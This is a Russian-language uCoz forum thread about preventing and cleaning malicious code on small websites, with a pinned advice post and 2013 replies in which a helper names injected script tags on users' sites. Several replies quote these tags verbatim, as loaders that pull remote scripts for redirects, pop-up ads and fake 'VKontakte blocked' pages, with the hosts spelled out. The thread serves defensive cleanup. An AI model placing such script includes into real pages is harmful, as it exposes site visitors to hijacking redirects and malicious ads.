Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04 21 Июн 2010
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте

  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    сondor
    Сообщений: 4661
    Репутация: 1528

    Сообщение # 196 | 20:52:48 26 Июн 2013
    Цитата (oooregoil)
    правильно опять все скрипты удалил, но как от этого обезопаситься в будущем, в тех поддержку написал (в том числе и платную) когда была проблема 12.06.13 с с вирусами и ссылками так они до сих пор отвечают. что делать что бы они не появлялись


    Просто в следующий раз не устанавливайте всякие мнительные скрипты, содержимое которых вам не известно.
    Деееенчик
    Сообщений: 190
    Репутация: 116

    Сообщение # 197 | 22:25:26 26 Июн 2013
    Цитата (webanet)
    Деееенчик, код находится в просилке зайти и зарегистрироваться. если не открывается сайт пишем сюда
    Цитата (webanet)
    Деееенчик, код находится в просилке зайти и зарегистрироваться. если не открывается сайт пишем сюда
    Огромное спасибо!Я после этого случая даже провереные iframe коды не добавляю,все скрипты проверяю!
    Благодарности в репутацию и в награды!
    P.S Плюс под аватаркой)
    oooregoil
    Сообщений: 20
    Репутация: 0

    Сообщение # 198 | 07:04:10 27 Июн 2013
    я вообще ни какие скрипты сам не устанавливаю
    uSHer
    Сообщений: 6
    Репутация: 0

    Сообщение # 199 | 01:04:10 01 Июл 2013
    1). vikradio.ru
    2). и под логином и под гостем
    3). скрин монитора с антивирусом
    4). гугл хром ничего не блокирует, визжит аваст.
    надеюсь на помощь.
    спасибо.
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 200 | 01:11:51 01 Июл 2013
    uSHer, сложно сказать почему аваст гавкает на мини-чат, но тем не менее сайт заражен

    панель управления - дизайн - управление дизайном - быстрая замена - в поле что заменить вставляете скрипт

    Код
    <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/af6arwcjnknnb15/menu.txt"></script>


    поле на что заменить оставляете пустым и производите замену во всех модулях. после очистки вы должны изменить uiD пароль профиля, которым администрируете сайт
    инструкция по замене тут //forum.ucoz.ru/forum/45-52299-1
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    ПАВ
    Сообщений: 9
    Репутация: 0

    Сообщение # 201 | 22:17:42 01 Июл 2013
    Подскажите пожалуйста, у меня какая-то беда на форумах, если заходишь с Мозилы или с Хрома. С Экспоера нормально. Курсор моргает не дает нажать на ссылки и т.п. И так с разных компов. Причем иногда почему-то вылезает инфа, что вКонтакте я забанен за спам (хотя там все нормально со страничкой). Несколько дней назад удалил все ссылки на Контакт и все равно форум глючит. Проявляется глюк не сразу, а через минутку-другую. Пытался сам справится с проблемой, но не получается (((

    http://bonistika-error.ucoz.ru/forum
    http://zenitspb.ucoz.ru/forum

    Добавлено (01 Июл 2013, 22:17:42)
    ---------------------------------------------
    Нашел подозрительный код. Одинаковый на нескольких страницах.Удалил, сменил пароль. Вроде бы глючить перестало. Но если посмотрите (может что-то осталось еще) буду благодарен..

    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 202 | 22:18:21 01 Июл 2013
    ПАВ, нет ничего.
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    ПАВ
    Сообщений: 9
    Репутация: 0

    Сообщение # 203 | 22:58:36 01 Июл 2013
    Спасибо огромное!
    ABEEZ
    Сообщений: 6
    Репутация: 0

    Сообщение # 204 | 16:18:20 02 Июл 2013
    Добрый день всем. Возникла проблема. Яндекс пишет.
    В коде части страниц Вашего сайта наши алгоритмы обнаружили код скрипта, меняющего окно результатов поиска на страницу другого сайта при переходе с поисковых машин. По этой причине мы были вынуждены временно исключить Ваш сайт из поиска.

    Один код я нашел, но Alarm говорит, что еще есть Iframe.WC и Exploit.HTML.IframeRef. Все перерыл. Не могу найти.
    Подскажите пожалуйста, где мне их искать. Сайт Spravkagorod.ru. Заранее спасибо.
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 205 | 16:42:06 02 Июл 2013
    ABEEZ,
    Цитата
    но Alarm говорит


    что такое аларм?

    и какой код вы удалили?
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Деееенчик
    Сообщений: 190
    Репутация: 116

    Сообщение # 206 | 16:45:16 02 Июл 2013
    Благодарности в репутацию и в награды!
    P.S Плюс под аватаркой)
    bestwom
    Сообщений: 2
    Репутация: 0

    Сообщение # 207 | 23:57:37 02 Июл 2013
    Здравствуйте.
    bestwom.ucoz.ru
    Появилось множество подозрительной рекламы, всплывающие ссылки, что контакт, одноклассники заблокированы и т.д. и т.п. в левом нижнем углу, всплывают постоянно. В верхнем правом углу реклама тоже. Какая то из них возможно юкоза, но точно не всплывающая.
    При нажатии на любую ссылку меню сайта открывает ее в новой странице, а на той, в которой было нажато на ссылку, открывается другая ссылка с перенаправлением на рекламный сайт, каждый раз разная.
    Никакую рекламу не ставила на сайт самостоятельно. Из стороннего стоят виджеты, ссылки на видео.
    Сайт из-за этого ужасно тормозит.
    Вирусов не обнаружено.
    Подскажите как избавиться от этой рекламы и откуда она взялась?
    Вечно я говорю «очень приятно с вами познакомиться», когда мне ничуть не приятно. … Но если хочешь жить с людьми, приходится говорить всякое.
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 208 | 00:17:32 03 Июл 2013
    bestwom, блок поиск по сайту удалить скрипт

    Код
    <script language="JavaScript" src="http://101widgets.com/00000506/200/200"></script>


    блок афоризм

    Код
    <script language="JavaScript" src="http://101widgets.com/ffff0009/180/220"></script>


    Цитата
    и откуда она взялась?
    вы сами поставили. не берите никогда скрипты с этого сайта. скриптами подгружается вся страница вместе с рекламой
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    bestjulia
    Сообщений: 2
    Репутация: 0

    Сообщение # 209 | 00:48:10 03 Июл 2013
    Здравствуйте. Появилась проблема с переадресацией на вирусную страницу "вконтакт закрыт".. возникает не всегда и не поняла схему включения (четкую страницу). Возникает и при входе "гостем" и "администратором" , но не всегда. Посмотрите пожалуйста http://liht.ucoz.ru/ ,что исправить?
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 210 | 00:55:48 03 Июл 2013
    bestjulia, панель управления - дизайн - управление дизайном - быстрая замена - в поле что заменить вставляете скрипт

    Код
    <script language="javascript" src="./js.php?s=54"></script><script language="javascript" src="http://golink1.ru9.biz/js/back.php?id=43"></script>


    поле на что заменить оставляете пустым и производите замену во всех модулях

    далее открываем главную на редактирование и удаляем кнопки соц.сетей

    Код
    <script type="text/javascript" src="http://jquery-base.ru/jl.php?share=15,7,10,14,16,24,34,35,38,41&size=32"></script>
    там тоже вшита реклама. нужны кнопки ставим с яндексом быстро чисто и просто. кнопки тут http://api.yandex.ru/share/

    после очистки вы должны изменить пароль uID профиля, которым администрируете сайт. инструкция по изменению тут //forum.ucoz.ru/forum/45-52299-1
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
    Поиск: